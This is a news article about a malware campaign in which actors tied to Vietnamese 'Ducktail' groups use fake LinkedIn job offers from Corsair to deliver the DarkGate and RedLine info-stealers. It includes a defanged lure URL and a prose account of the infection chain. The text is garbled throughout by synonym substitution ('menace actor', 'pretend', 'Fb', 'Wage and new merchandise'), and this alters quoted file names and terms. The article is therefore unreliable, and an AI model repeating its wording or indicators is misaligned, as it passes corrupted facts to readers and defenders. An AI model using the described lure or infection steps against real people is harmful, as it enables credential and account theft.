A menace actor is utilizing pretend LinkedIn posts and direct messages a few Fb Advertisements specialist place at {hardware} maker Corsair to lure individuals into downloading info-stealing malware like DarkGate and RedLine.
Cybersecurity firm WithSecure detected the exercise and tracked the exercise of the group, displaying in a report right this moment that it’s linked to Vietnamese cybercriminal teams chargeable for the ‘Ducktail’ campaigns first noticed final yr.
These campaigns goal to steal precious Fb enterprise accounts that can be utilized for malvertising or offered to different cybercriminals.
DarkGate was first noticed in 2017 however its deployment remained restricted till June 2023, when its writer determined to promote entry to the malware to a bigger viewers.
Current examples of DarkGate’s use embody phishing assaults by means of Microsoft Groups that push the payload and leveraging compromised Skype accounts to ship VBS scripts to set off an an infection chain resulting in the malware.
Corsair lure
The Vietnamese menace actors focused primarily customers within the U.S., the U.Ok., and India, who maintain social media administration positions and are prone to have entry to Fb enterprise accounts. The lure is delivered over LinkedIn and includes a job provide at Corsair.
Targets are tricked into downloading malicious information from a URL(“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Wage and new merchandise.8.4.zip”) with a PDF or DOCX doc and a TXT file with thefollowing names:
- Job Description of Corsair.docx
- Wage and new merchandise.txt
- PDF Wage and Merchandise.pdf
WithSecure researchers analyzed the metadata for the above information and located results in RedLine stealer distribution.
The downloaded archive accommodates a VBS script, probably embedded within the DOCX file, that copies and renames ‘curl.exe’ to a brand new location and leverages it to obtain ‘autoit3.exe’ and a compiled Autoit3 script.
The executable launches the script, and the latter de-obfuscates itself and constructs DarkGate utilizing strings current within the script.
Thirty seconds after set up, the malware makes an attempt to uninstall safety merchandise from the compromised system, indicating the existence of an automatic course of.
LinkedIn launched options to combat abuse within the platform late final yr that may assist customers decide if an account is suspicious or pretend. Nevertheless, it falls on the customers to examine the verified information earlier than participating in communication with a brand new account.
WithSecure has launched a listing of indicators of compromise (IoCs) that would assist organizations defend towards exercise from this menace actor. The main points embody IP addresses, domains used, URLs, file metadata, and names of archives.
